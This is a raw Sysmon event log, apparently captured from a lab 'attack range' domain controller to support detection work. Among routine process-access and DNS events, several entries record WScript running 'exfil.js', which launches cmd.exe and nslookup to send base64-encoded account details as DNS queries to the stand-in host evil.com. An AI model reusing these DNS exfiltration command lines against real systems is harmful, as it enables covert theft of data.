14:16:28.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.253{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1C40-000000005F02}1676C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.253{2E1864BB-17BC-629A-1A40-000000005F02}10285136C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-1C40-000000005F02}1676C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.258{2E1864BB-17BC-629A-1C40-000000005F02}1676C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-1A40-000000005F02}1028C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljuts.tmp 2>&1 10341000x8000000000000000199525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.206{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1B40-000000005F02}5776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.206{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1B40-000000005F02}5776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.905{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-52601-false127.0.0.1-53domain 354300x8000000000000000199522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.905{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-52600-false127.0.0.1-53domain 354300x8000000000000000199521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.904{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-52600-false127.0.0.1-53domain 354300x8000000000000000199520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.904{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-52599-false127.0.0.1-53domain 354300x8000000000000000199519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.904{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-52599-false127.0.0.1-53domain 354300x8000000000000000199518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.832{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-52598-false127.0.0.1-53domain 354300x8000000000000000199517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.832{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-52597-false127.0.0.1-53domain 10341000x8000000000000000199516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.206{2E1864BB-17BC-629A-1B40-000000005F02}57763008C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1A40-000000005F02}1028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.762{00000000-0000-0000-0000-000000000000}1692<unknown process>-udpfalsefalse127.0.0.1-52595-false127.0.0.1-53domain 354300x8000000000000000199514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{00000000-0000-0000-0000-000000000000}1692<unknown process>-udpfalsefalse127.0.0.1-52594-false127.0.0.1-53domain 354300x8000000000000000199513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.533{00000000-0000-0000-0000-000000000000}4996<unknown process>-udpfalsefalse127.0.0.1-52586-false127.0.0.1-53domain 354300x8000000000000000199512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.531{00000000-0000-0000-0000-000000000000}4996<unknown process>-udpfalsefalse127.0.0.1-52584-false127.0.0.1-53domain 354300x8000000000000000199511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.531{00000000-0000-0000-0000-000000000000}4996<unknown process>-udptruefalse127.0.0.1-52584-false127.0.0.1-53domain 10341000x8000000000000000199510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.184{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1B40-000000005F02}5776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.169{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1A40-000000005F02}1028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.169{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.169{2E1864BB-17A1-629A-783D-000000005F02}55525196C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-1A40-000000005F02}1028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.177{2E1864BB-17BC-629A-1A40-000000005F02}1028C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljuts.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.153{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljgd.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-17BC-629A-1840-000000005F02}48047808C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1940-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1940-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-17BC-629A-1740-000000005F02}79645232C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-1940-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.127{2E1864BB-17BC-629A-1940-000000005F02}7632C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-1740-000000005F02}7964C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljgd.tmp 2>&1 10341000x8000000000000000199493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.084{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1840-000000005F02}4804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.084{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1840-000000005F02}4804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.084{2E1864BB-17BC-629A-1840-000000005F02}48047808C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1740-000000005F02}7964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.069{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1840-000000005F02}4804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.053{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1740-000000005F02}7964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 